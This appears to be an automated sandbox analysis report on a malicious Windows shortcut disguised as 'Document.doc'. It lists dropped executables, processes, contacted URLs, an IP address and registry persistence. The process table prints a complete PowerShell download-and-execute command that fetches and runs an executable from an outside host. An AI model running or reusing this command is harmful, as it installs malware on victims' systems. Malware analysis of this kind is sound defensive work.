Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| Document.doc.lnk | MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=1, Archive, ctime=Mon Mar 4 12:38:03 2024, mtime=Thu Mar 28 00:08:10 2024, atime=Mon Mar 4 12:38:03 2024, length=236544, window=hidenormalshowminimized | initial sample | |
| C:\Users\user\windrv.exe | PE32 executable (GUI) Intel 80386, for MS Windows | dropped | |
| C:\Users\user\winsvc.exe | PE32 executable (GUI) Intel 80386, for MS Windows | dropped | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31cwohp1.xgz.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hos10ij.2v0.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqpxgnpy.exl.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qaprh5ea.nop.psm1 | ASCII text, with no line terminators | dropped | |
Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process 'C:\Users\user\windrv.exe' | |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process 'C:\Users\user\windrv.exe' | |
| C:\Users\user\windrv.exe | "C:\Users\user\windrv.exe" | |
| C:\Users\user\winsvc.exe | C:\Users\user\winsvc.exe | |
| C:\Users\user\winsvc.exe | "C:\Users\user\winsvc.exe" | |
| C:\Users\user\winsvc.exe | "C:\Users\user\winsvc.exe" | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
URLs

| Name | IP | Malicious |
|---|---|---|
| http://twizt.net | unknown | |
| http://twizt.net/spl.exe | 185.215.113.66 | |
| http://twizt.net/Installed | 185.215.113.66 | |
| http://twizt.net/lslut.exe | 185.215.113.66 | |
| http://twizt.net/lslut.exewinsvc.exe | unknown | |
| http://twizt.net/InstalledT | unknown | |
| http://twizt.net/lslj | unknown | |
| http://twizt.net/lslut.eH | unknown | |
| http://twizt.net/InstalledopenMozilla/5.0 | unknown | |
| http://twizt.net/lslut.exee | unknown | |
| http://twizt.net/lslut.exeb | unknown | |
| http://twizt.net/InstalledL | unknown | |
| http://twizt.net/lslut.e | unknown | |
| http://twizt.net/lslut.e8 | unknown | |
| http://twizt.net/lslut.exeu | unknown | |
| http://twizt.net/lslut.exe2 | unknown | |
| http://twizt.net/lslut.exer | unknown | |
| http://twizt.net/lslut.exes | unknown | |
| http://fuckput.in/N | unknown | |
| http://twizt.net/lslut.exewinsvc.exeKT | unknown | |
| http://twizt.net/InstalledXZ | unknown | |
| http://twizt.net/lsl | unknown | |
| http://twizt.net/lslut.exe%s:Zone.Identifier%userprofile%%s | unknown | |
| http://twizt.net/? | unknown | |
| http://fuckput.in/ | unknown | |

15 further URLs are not shown in this report.
Domains

| Name | IP | Malicious |
|---|---|---|
| twizt.net | 185.215.113.66 | |
IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 185.215.113.66 | twizt.net | Portugal | |
Registry

| Path | Value | Malicious |
|---|---|---|
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | |
| HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Windows Service | |

5 further registry entries are not shown in this report.
Memdumps